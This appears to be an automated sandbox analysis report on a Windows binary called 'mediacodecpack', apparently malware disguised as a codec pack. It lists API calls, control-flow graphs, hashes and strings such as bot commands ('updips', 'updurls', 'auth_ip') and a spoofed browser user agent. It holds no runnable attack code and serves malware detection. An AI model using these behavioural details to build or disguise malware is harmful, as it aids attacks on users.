                                                                                            control_flow_graph 458 2d463f5-2d46448 459 2d46464-2d4646e 458->459 460 2d4644a-2d46450 458->460 461 2d46474-2d46498 call 2d53760 call 2d4439c 459->461 462 2d460f0-2d460f2 459->462 463 2d46456-2d46463 call 2d4534d 460->463 464 2d46452-2d46454 460->464 461->462 476 2d4649e-2d464c9 RtlEnterCriticalSection RtlLeaveCriticalSection call 2d5134c 461->476 467 2d460f4-2d460f9 462->467 468 2d460fb-2d460fd 462->468 463->459 464->459 471 2d46104 Sleep 467->471 472 2d460ff 468->472 473 2d4610a-2d46139 RtlEnterCriticalSection RtlLeaveCriticalSection 468->473 471->473 472->471 473->458 479 2d46513-2d4652b call 2d5134c 476->479 480 2d464cb-2d464da call 2d5134c 476->480 485 2d46531-2d46533 479->485 486 2d467d2-2d467e1 call 2d5134c 479->486 480->479 487 2d464dc-2d464eb call 2d5134c 480->487 485->486 490 2d46539-2d465e4 call 2d51fbc RtlEnterCriticalSection RtlLeaveCriticalSection call 2d53760 * 5 call 2d4439c * 2 485->490 495 2d46826-2d46835 call 2d5134c 486->495 496 2d467e3-2d467e5 486->496 487->479 494 2d464ed-2d464fc call 2d5134c 487->494 541 2d465e6-2d465e8 490->541 542 2d46621 490->542 494->479 510 2d464fe-2d4650d call 2d5134c 494->510 508 2d46837-2d46845 call 2d45c11 call 2d45d1f 495->508 509 2d4684a-2d46859 call 2d5134c 495->509 496->495 500 2d467e7-2d46821 call 2d53760 RtlEnterCriticalSection RtlLeaveCriticalSection 496->500 500->462 508->462 509->462 521 2d4685f-2d46861 509->521 510->462 510->479 521->462 524 2d46867-2d46880 call 2d4439c 521->524 524->462 529 2d46886-2d46955 call 2d51428 call 2d41ba7 524->529 539 2d46957 call 2d4143f 529->539 540 2d4695c-2d4697d RtlEnterCriticalSection 529->540 539->540 545 2d4697f-2d46986 540->545 546 2d46989-2d469f0 RtlLeaveCriticalSection call 2d43c67 call 2d43d7e call 2d4733f 540->546 541->542 547 2d465ea-2d465fc call 2d5134c 541->547 543 2d46625-2d46653 call 2d51fbc call 2d53760 call 2d4439c 542->543 567 2d46694-2d4669d call 2d51f84 543->567 568 2d46655-2d46664 call 2d525f6 543->568 545->546 565 2d469f6-2d46a38 call 2d49729 546->565 566 2d46b58-2d46b6c call 2d48007 546->566 547->542 554 2d465fe-2d4661f call 2d4439c 547->554 554->543 577 2d46b22-2d46b53 call 2d473ee call 2d433b2 565->577 578 2d46a3e-2d46a45 565->578 566->462 579 2d467c0-2d467cd 567->579 580 2d466a3-2d466bb call 2d527c5 567->580 568->567 581 2d46666 568->581 577->566 584 2d46a48-2d46a4d 578->584 579->462 593 2d466c7 580->593 594 2d466bd-2d466c5 call 2d4873b 580->594 582 2d4666b-2d4667d call 2d51860 581->582 596 2d46682-2d46692 call 2d525f6 582->596 597 2d4667f 582->597 584->584 588 2d46a4f-2d46a94 call 2d49729 584->588 588->577 602 2d46a9a-2d46aa0 588->602 595 2d466c9-2d4676d call 2d49853 call 2d43863 call 2d45119 call 2d43863 call 2d49af9 call 2d49c13 593->595 594->595 623 2d46774-2d4679f Sleep call 2d50900 595->623 624 2d4676f call 2d4380b 595->624 596->567 596->582 597->596 606 2d46aa3-2d46aa8 602->606 606->606 608 2d46aaa-2d46ae5 call 2d49729 606->608 608->577 614 2d46ae7-2d46b21 call 2d4c11b 608->614 614->577 628 2d467a1-2d467aa call 2d44100 623->628 629 2d467ab-2d467b9 623->629 624->623 628->629 629->579 631 2d467bb call 2d4380b 629->631 631->579
                                                                                            APIs
                                                                                            • Sleep.KERNELBASE(0000EA60), ref: 02D46104
                                                                                            • RtlEnterCriticalSection.NTDLL(02D74FD0), ref: 02D4610F
                                                                                            • RtlLeaveCriticalSection.NTDLL(02D74FD0), ref: 02D46120
                                                                                              • Part of subcall function 02D527C5: _malloc.LIBCMT ref: 02D527DD
                                                                                            • _memset.LIBCMT ref: 02D46480
                                                                                            • RtlEnterCriticalSection.NTDLL(02D74FD0), ref: 02D464A3
                                                                                            • RtlLeaveCriticalSection.NTDLL(02D74FD0), ref: 02D464B4
                                                                                            • _malloc.LIBCMT ref: 02D4653B
                                                                                            • RtlEnterCriticalSection.NTDLL(02D74FD0), ref: 02D4654D
                                                                                            • RtlLeaveCriticalSection.NTDLL(02D74FD0), ref: 02D46559
                                                                                            • _memset.LIBCMT ref: 02D46573
                                                                                            • _memset.LIBCMT ref: 02D46582
                                                                                            • _memset.LIBCMT ref: 02D46592
                                                                                            • _memset.LIBCMT ref: 02D465A1
                                                                                            • _memset.LIBCMT ref: 02D465B0
                                                                                            • _malloc.LIBCMT ref: 02D4662A
                                                                                            • _memset.LIBCMT ref: 02D4663B
                                                                                            • _strtok.LIBCMT ref: 02D4665B
                                                                                            • _swscanf.LIBCMT ref: 02D46672
                                                                                            • _strtok.LIBCMT ref: 02D46689
                                                                                            • _free.LIBCMT ref: 02D46695
                                                                                            • Sleep.KERNEL32(000007D0), ref: 02D46779
                                                                                            • _memset.LIBCMT ref: 02D467F2
                                                                                            • RtlEnterCriticalSection.NTDLL(02D74FD0), ref: 02D467FF
                                                                                            • RtlLeaveCriticalSection.NTDLL(02D74FD0), ref: 02D46811
                                                                                              • Part of subcall function 02D4873B: __EH_prolog.LIBCMT ref: 02D48740
                                                                                              • Part of subcall function 02D4873B: RtlEnterCriticalSection.NTDLL(00000020), ref: 02D487BB
                                                                                              • Part of subcall function 02D4873B: RtlLeaveCriticalSection.NTDLL(00000020), ref: 02D487D9
                                                                                            • _sprintf.LIBCMT ref: 02D4689B
                                                                                            • RtlEnterCriticalSection.NTDLL(00000020), ref: 02D46960
                                                                                            • RtlLeaveCriticalSection.NTDLL(00000020), ref: 02D46994
                                                                                              • Part of subcall function 02D45C11: _malloc.LIBCMT ref: 02D45C1F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$_memset$EnterLeave$_malloc$Sleep_strtok$H_prolog_free_sprintf_swscanf
                                                                                            • String ID: $%d;$<htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$auth_ip$auth_swith$block$connect$disconnect$idle$updips$updurls
                                                                                            • API String ID: 3337033272-2823103634
                                                                                            • Opcode ID: e6e5016ebdc7090a6d01bddd9a6ba44a3fd94803498a3ed13d9d65c77a6c3122
                                                                                            • Instruction ID: a89ee1b9319bfd80b77b87fa5aab58741eba43b193dfb644bb11ec977cf00533
                                                                                            • Opcode Fuzzy Hash: e6e5016ebdc7090a6d01bddd9a6ba44a3fd94803498a3ed13d9d65c77a6c3122
                                                                                            • Instruction Fuzzy Hash: B71205315483819BE7249B24E854BAB7BE5EF86714F14481DE5CA97381EF70DC48CBA2

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02D41D11
                                                                                            • GetLastError.KERNEL32 ref: 02D41D23
                                                                                              • Part of subcall function 02D41712: __EH_prolog.LIBCMT ref: 02D41717
                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02D41D59
                                                                                            • GetLastError.KERNEL32 ref: 02D41D6B
                                                                                            • __beginthreadex.LIBCMT ref: 02D41DB1
                                                                                            • GetLastError.KERNEL32 ref: 02D41DC6
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02D41DDD
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02D41DEC
                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D41E14
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02D41E1B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseErrorHandleLast$CreateEvent$H_prologObjectSingleWait__beginthreadex
                                                                                            • String ID: thread$thread.entry_event$thread.exit_event
                                                                                            • API String ID: 831262434-3017686385
                                                                                            • Opcode ID: 0dc9ad2c3fe5ec6bd7960a7ced2eb3cfa91965de6bd7e9f8c711f8dd2fa04c3a
                                                                                            • Instruction ID: 2b628efc88e92470e054e2de7769949afe981fedce5d7cf55e87f450f782bb8b
                                                                                            • Opcode Fuzzy Hash: 0dc9ad2c3fe5ec6bd7960a7ced2eb3cfa91965de6bd7e9f8c711f8dd2fa04c3a
                                                                                            • Instruction Fuzzy Hash: 47313975A043119FD700EF24D888B2BBBA5EF84750F104969F9599B390DB70DD89CBE2

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02D44D8B
                                                                                            • RtlEnterCriticalSection.NTDLL(02D74FD0), ref: 02D44DB7
                                                                                            • RtlLeaveCriticalSection.NTDLL(02D74FD0), ref: 02D44DC3
                                                                                              • Part of subcall function 02D44BED: __EH_prolog.LIBCMT ref: 02D44BF2
                                                                                              • Part of subcall function 02D44BED: InterlockedExchange.KERNEL32(?,00000000), ref: 02D44CF2
                                                                                            • RtlEnterCriticalSection.NTDLL(02D74FD0), ref: 02D44E93
                                                                                            • RtlLeaveCriticalSection.NTDLL(02D74FD0), ref: 02D44E99
                                                                                            • RtlEnterCriticalSection.NTDLL(02D74FD0), ref: 02D44EA0
                                                                                            • RtlLeaveCriticalSection.NTDLL(02D74FD0), ref: 02D44EA6
                                                                                            • RtlEnterCriticalSection.NTDLL(02D74FD0), ref: 02D450A7
                                                                                            • RtlLeaveCriticalSection.NTDLL(02D74FD0), ref: 02D450AD
                                                                                            • RtlEnterCriticalSection.NTDLL(02D74FD0), ref: 02D450B8
                                                                                            • RtlLeaveCriticalSection.NTDLL(02D74FD0), ref: 02D450C1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                                                            • String ID:
                                                                                            • API String ID: 2062355503-0
                                                                                            • Opcode ID: b87d01774742d521eaf2d28f1583f6c57983a27eb51384af91172566d9397456
                                                                                            • Instruction ID: 094774e7e4856020b38d3e7f37b3570458b032dfb54c2a8f17022c72cb1003d5
                                                                                            • Opcode Fuzzy Hash: b87d01774742d521eaf2d28f1583f6c57983a27eb51384af91172566d9397456
                                                                                            • Instruction Fuzzy Hash: EFB14871D0025EDFEF11DFA0D854BEEBBB5AF14318F24405AE40566280DBB56E89CFA1

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 735 401301-40135e FindResourceA 736 401360-401362 735->736 737 401367-40137d SizeofResource 735->737 738 401538-40153c 736->738 739 401386-4013fe LoadResource LockResource GlobalAlloc call 402490 * 2 737->739 740 40137f-401381 737->740 745 401407-40140b 739->745 740->738 746 40140d-40141d 745->746 747 40141f-401428 GetTickCount 745->747 746->745 749 401491-401499 747->749 750 40142a-40142e 747->750 751 4014a2-4014a8 749->751 752 401430-401438 750->752 753 40148f 750->753 754 4014f0-401525 GlobalAlloc call 401000 751->754 755 4014aa-4014e8 751->755 756 401441-401447 752->756 753->754 763 40152a-401535 754->763 757 4014ea 755->757 758 4014ee 755->758 760 401449-401485 756->760 761 40148d 756->761 757->758 758->751 764 401487 760->764 765 40148b 760->765 761->750 763->738 764->765 765->756
                                                                                            APIs
                                                                                            • FindResourceA.KERNEL32(?,0000000A), ref: 00401351
                                                                                            • SizeofResource.KERNEL32(00000000), ref: 00401370
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2733375841.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2733375841.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: Resource$FindSizeof
                                                                                            • String ID:
                                                                                            • API String ID: 3019604839-3916222277
                                                                                            • Opcode ID: d05602b0e20a881077e161112d5bd34232c8f71c7560e683aad862cf59917e15
                                                                                            • Instruction ID: 779852d327d389dbbb2f1b261a2bb7141e3a4eae573781fe7d13a424a4f3f89b
                                                                                            • Opcode Fuzzy Hash: d05602b0e20a881077e161112d5bd34232c8f71c7560e683aad862cf59917e15
                                                                                            • Instruction Fuzzy Hash: F1811075D04258DFDF01CFE8D985AEEBBB0BF09305F1400AAE581B7262C3385A84DB69

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02D42706
                                                                                            • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02D4272B
                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02D63173), ref: 02D42738
                                                                                              • Part of subcall function 02D41712: __EH_prolog.LIBCMT ref: 02D41717
                                                                                            • SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02D42778
                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02D427D9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                            • String ID: timer
                                                                                            • API String ID: 4293676635-1792073242
                                                                                            • Opcode ID: 68c13b5b7352a56c9438109a69e784da771a07d5ead57cb4e8bb13b66668d91e
                                                                                            • Instruction ID: b7e1f5c9386c775aa75d9a28e5a5e5ec233da17adbfd39c7f9f0aa927ec4b625
                                                                                            • Opcode Fuzzy Hash: 68c13b5b7352a56c9438109a69e784da771a07d5ead57cb4e8bb13b66668d91e
                                                                                            • Instruction Fuzzy Hash: D3318BB1904705AFD310DF65D888B26BBE8FB48B65F004A2EF85592B80DB70ED54CFA1

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 901 2d41ba7-2d41bcf call 2d62a10 RtlEnterCriticalSection 904 2d41bd1 901->904 905 2d41be9-2d41bf7 RtlLeaveCriticalSection call 2d4d334 901->905 906 2d41bd4-2d41be0 call 2d41b79 904->906 908 2d41bfa-2d41c20 RtlEnterCriticalSection 905->908 911 2d41c55-2d41c6e RtlLeaveCriticalSection 906->911 912 2d41be2-2d41be7 906->912 910 2d41c34-2d41c36 908->910 913 2d41c22-2d41c2f call 2d41b79 910->913 914 2d41c38-2d41c43 910->914 912->905 912->906 916 2d41c45-2d41c4b 913->916 919 2d41c31 913->919 914->916 916->911 918 2d41c4d-2d41c51 916->918 918->911 919->910
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02D41BAC
                                                                                            • RtlEnterCriticalSection.NTDLL ref: 02D41BBC
                                                                                            • RtlLeaveCriticalSection.NTDLL ref: 02D41BEA
                                                                                            • RtlEnterCriticalSection.NTDLL ref: 02D41C13
                                                                                            • RtlLeaveCriticalSection.NTDLL ref: 02D41C56
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterLeave$H_prolog
                                                                                            • String ID:
                                                                                            • API String ID: 1633115879-0
                                                                                            • Opcode ID: 0dbe5cddd538a669e1c1e1596cf908b78d91a810e9a7bc62f4d072d74f4b6976
                                                                                            • Instruction ID: 8fd1f52bdcfd16d525c93767b946d3692b0befc6514c7013a3641d518e895543
                                                                                            • Opcode Fuzzy Hash: 0dbe5cddd538a669e1c1e1596cf908b78d91a810e9a7bc62f4d072d74f4b6976
                                                                                            • Instruction Fuzzy Hash: 3D21CA71A002049FCB10CF68D8487AABBB5FF48324F208549E81997300DB71EE85CBE0

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 929 2d4615e-2d46161 930 2d460f5-2d460f9 929->930 931 2d46163-2d46174 929->931 932 2d46104 Sleep 930->932 931->929 934 2d4610a-2d46448 RtlEnterCriticalSection RtlLeaveCriticalSection 932->934 936 2d46464-2d4646e 934->936 937 2d4644a-2d46450 934->937 938 2d46474-2d46498 call 2d53760 call 2d4439c 936->938 939 2d460f0-2d460f2 936->939 940 2d46456-2d46463 call 2d4534d 937->940 941 2d46452-2d46454 937->941 938->939 951 2d4649e-2d464c9 RtlEnterCriticalSection RtlLeaveCriticalSection call 2d5134c 938->951 944 2d460f4-2d460f9 939->944 945 2d460fb-2d460fd 939->945 940->936 941->936 944->932 945->934 948 2d460ff 945->948 948->932 954 2d46513-2d4652b call 2d5134c 951->954 955 2d464cb-2d464da call 2d5134c 951->955 960 2d46531-2d46533 954->960 961 2d467d2-2d467e1 call 2d5134c 954->961 955->954 962 2d464dc-2d464eb call 2d5134c 955->962 960->961 965 2d46539-2d465e4 call 2d51fbc RtlEnterCriticalSection RtlLeaveCriticalSection call 2d53760 * 5 call 2d4439c * 2 960->965 970 2d46826-2d46835 call 2d5134c 961->970 971 2d467e3-2d467e5 961->971 962->954 969 2d464ed-2d464fc call 2d5134c 962->969 1016 2d465e6-2d465e8 965->1016 1017 2d46621 965->1017 969->954 985 2d464fe-2d4650d call 2d5134c 969->985 983 2d46837-2d46845 call 2d45c11 call 2d45d1f 970->983 984 2d4684a-2d46859 call 2d5134c 970->984 971->970 975 2d467e7-2d46821 call 2d53760 RtlEnterCriticalSection RtlLeaveCriticalSection 971->975 975->939 983->939 984->939 996 2d4685f-2d46861 984->996 985->939 985->954 996->939 999 2d46867-2d46880 call 2d4439c 996->999 999->939 1004 2d46886-2d46955 call 2d51428 call 2d41ba7 999->1004 1014 2d46957 call 2d4143f 1004->1014 1015 2d4695c-2d4697d RtlEnterCriticalSection 1004->1015 1014->1015 1020 2d4697f-2d46986 1015->1020 1021 2d46989-2d469f0 RtlLeaveCriticalSection call 2d43c67 call 2d43d7e call 2d4733f 1015->1021 1016->1017 1022 2d465ea-2d465fc call 2d5134c 1016->1022 1018 2d46625-2d46653 call 2d51fbc call 2d53760 call 2d4439c 1017->1018 1042 2d46694-2d4669d call 2d51f84 1018->1042 1043 2d46655-2d46664 call 2d525f6 1018->1043 1020->1021 1040 2d469f6-2d46a38 call 2d49729 1021->1040 1041 2d46b58-2d46b6c call 2d48007 1021->1041 1022->1017 1029 2d465fe-2d4661f call 2d4439c 1022->1029 1029->1018 1052 2d46b22-2d46b53 call 2d473ee call 2d433b2 1040->1052 1053 2d46a3e-2d46a45 1040->1053 1041->939 1054 2d467c0-2d467cd 1042->1054 1055 2d466a3-2d466bb call 2d527c5 1042->1055 1043->1042 1056 2d46666 1043->1056 1052->1041 1059 2d46a48-2d46a4d 1053->1059 1054->939 1068 2d466c7 1055->1068 1069 2d466bd-2d466c5 call 2d4873b 1055->1069 1057 2d4666b-2d4667d call 2d51860 1056->1057 1071 2d46682-2d46692 call 2d525f6 1057->1071 1072 2d4667f 1057->1072 1059->1059 1063 2d46a4f-2d46a94 call 2d49729 1059->1063 1063->1052 1077 2d46a9a-2d46aa0 1063->1077 1070 2d466c9-2d4676d call 2d49853 call 2d43863 call 2d45119 call 2d43863 call 2d49af9 call 2d49c13 1068->1070 1069->1070 1098 2d46774-2d4679f Sleep call 2d50900 1070->1098 1099 2d4676f call 2d4380b 1070->1099 1071->1042 1071->1057 1072->1071 1081 2d46aa3-2d46aa8 1077->1081 1081->1081 1083 2d46aaa-2d46ae5 call 2d49729 1081->1083 1083->1052 1089 2d46ae7-2d46b21 call 2d4c11b 1083->1089 1089->1052 1103 2d467a1-2d467aa call 2d44100 1098->1103 1104 2d467ab-2d467b9 1098->1104 1099->1098 1103->1104 1104->1054 1106 2d467bb call 2d4380b 1104->1106 1106->1054
                                                                                            APIs
                                                                                            • Sleep.KERNELBASE(0000EA60), ref: 02D46104
                                                                                            • RtlEnterCriticalSection.NTDLL(02D74FD0), ref: 02D4610F
                                                                                            • RtlLeaveCriticalSection.NTDLL(02D74FD0), ref: 02D46120
                                                                                            Strings
                                                                                            • Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US), xrefs: 02D46129
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterLeaveSleep
                                                                                            • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                            • API String ID: 1566154052-1923541051
                                                                                            • Opcode ID: 04552af441d8f04ba54017b96db073517d7547db9ca07ace0b0318d8f9f3ce45
                                                                                            • Instruction ID: d5a1bfe819aed5adfb61c1b6f767e7a1d62e89ffc7e0e3fda0b9ee0fba3c323b
                                                                                            • Opcode Fuzzy Hash: 04552af441d8f04ba54017b96db073517d7547db9ca07ace0b0318d8f9f3ce45
                                                                                            • Instruction Fuzzy Hash: 41F06D2298C3C09FD7038B70B8686A57F70AF5B214B5A04C7E5C69B793C599AC49C7B2

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetVersion.KERNEL32 ref: 00402A46
                                                                                              • Part of subcall function 00403B64: HeapCreate.KERNELBASE(00000000,00001000,00000000,00402A7F,00000000), ref: 00403B75
                                                                                              • Part of subcall function 00403B64: HeapDestroy.KERNEL32 ref: 00403BB4
                                                                                            • GetCommandLineA.KERNEL32 ref: 00402A94
                                                                                            • GetStartupInfoA.KERNEL32(?), ref: 00402ABF
                                                                                            • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00402AE2
                                                                                              • Part of subcall function 00402B3B: ExitProcess.KERNEL32 ref: 00402B58
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2733375841.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2733375841.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                                            • String ID:
                                                                                            • API String ID: 2057626494-0
                                                                                            • Opcode ID: 81c04d43b3f46c58329c6832fe0805ef85b64df99fa32ea28edf2ad19d5a1781
                                                                                            • Instruction ID: 5f87248e4510ca7a7a053da507506fe2897125482441b09741c869e2758f94b2
                                                                                            • Opcode Fuzzy Hash: 81c04d43b3f46c58329c6832fe0805ef85b64df99fa32ea28edf2ad19d5a1781
                                                                                            • Instruction Fuzzy Hash: BA214CB19006159ADB04AFA6DE49A6E7FA8EB04715F10413FF905BB2D1DB384900CA6C

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1137 2d42edd-2d42f1f WSASetLastError WSASocketA call 2d4fb20 WSAGetLastError 1140 2d42f21-2d42f25 1137->1140 1141 2d42f49-2d42f4f 1137->1141 1142 2d42f27-2d42f36 setsockopt 1140->1142 1143 2d42f3c-2d42f47 call 2d4fb20 1140->1143 1142->1143 1143->1141
                                                                                            APIs
                                                                                            • WSASetLastError.WS2_32(00000000), ref: 02D42EEE
                                                                                            • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02D42EFD
                                                                                            • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02D42F0C
                                                                                            • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 02D42F36
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$Socketsetsockopt
                                                                                            • String ID:
                                                                                            • API String ID: 2093263913-0
                                                                                            • Opcode ID: 534cd4939d0358048c5d20d47bb1e984d8a706b5b9916870b8f6da8c510d83d6
                                                                                            • Instruction ID: 99f9d87808719204d5842b8d7434fd78f1cac34e00051af17ed7097dd1958b9e
                                                                                            • Opcode Fuzzy Hash: 534cd4939d0358048c5d20d47bb1e984d8a706b5b9916870b8f6da8c510d83d6
                                                                                            • Instruction Fuzzy Hash: 53017575900204BBDB209F66DC4CB5A7BA9DB86761F408565F918DB291DB748D00CBB0
                                                                                            APIs
                                                                                              • Part of subcall function 02D42D39: WSASetLastError.WS2_32(00000000), ref: 02D42D47
                                                                                              • Part of subcall function 02D42D39: WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02D42D5C
                                                                                            • WSASetLastError.WS2_32(00000000), ref: 02D42E6D
                                                                                            • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 02D42E83
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$Sendselect
                                                                                            • String ID: 3'
                                                                                            • API String ID: 2958345159-280543908
                                                                                            • Opcode ID: ace540f48ad4d85c3b4828feb02ac82d938b8432b983a2fb97e4e4f843ec1eee
                                                                                            • Instruction ID: 5bc4f34a87ff2fee40b1790f26978f97e33197058cc8a59ac1a18587261eb559
                                                                                            • Opcode Fuzzy Hash: ace540f48ad4d85c3b4828feb02ac82d938b8432b983a2fb97e4e4f843ec1eee
                                                                                            • Instruction Fuzzy Hash: 1C3169B1A102099FDB10DFA4C8587EEBBAAEF05354F00456AEC1597740EB759D90CBE0
                                                                                            APIs
                                                                                            • WSASetLastError.WS2_32(00000000), ref: 02D42AEA
                                                                                            • connect.WS2_32(?,?,?), ref: 02D42AF5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLastconnect
                                                                                            • String ID: 3'
                                                                                            • API String ID: 374722065-280543908
                                                                                            • Opcode ID: 2d7a9135cc84a97539b4b7baf440eb14f48fe93ea0295842582528c1f9def468
                                                                                            • Instruction ID: 856af057a0abc467fea6e528149c963ae933f62d1606217396facb7c666ecff6
                                                                                            • Opcode Fuzzy Hash: 2d7a9135cc84a97539b4b7baf440eb14f48fe93ea0295842582528c1f9def468
                                                                                            • Instruction Fuzzy Hash: A7219274E00204ABCF10AFA4D4286AEBBBAEF45324F108199EC5897380DF749E01CBA1
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prolog
                                                                                            • String ID:
                                                                                            • API String ID: 3519838083-0
                                                                                            • Opcode ID: 95134f48367f168ce9edb1a165cb20cc4b9064b77133179e4e246f0b61e115c6
                                                                                            • Instruction ID: 710e72d7b0a11f966cab9c5786c839d175eed0a8b6dc355c51a253f5477773a6
                                                                                            • Opcode Fuzzy Hash: 95134f48367f168ce9edb1a165cb20cc4b9064b77133179e4e246f0b61e115c6
                                                                                            • Instruction Fuzzy Hash: 4F5129B1905246DFCB48DF68D4556AABBB1FF08320F20819EE8699B390DB74DD10CFA1
                                                                                            APIs
                                                                                            • InterlockedIncrement.KERNEL32(?), ref: 02D436A7
                                                                                              • Part of subcall function 02D42420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02D42432
                                                                                              • Part of subcall function 02D42420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02D42445
                                                                                              • Part of subcall function 02D42420: RtlEnterCriticalSection.NTDLL(?), ref: 02D42454
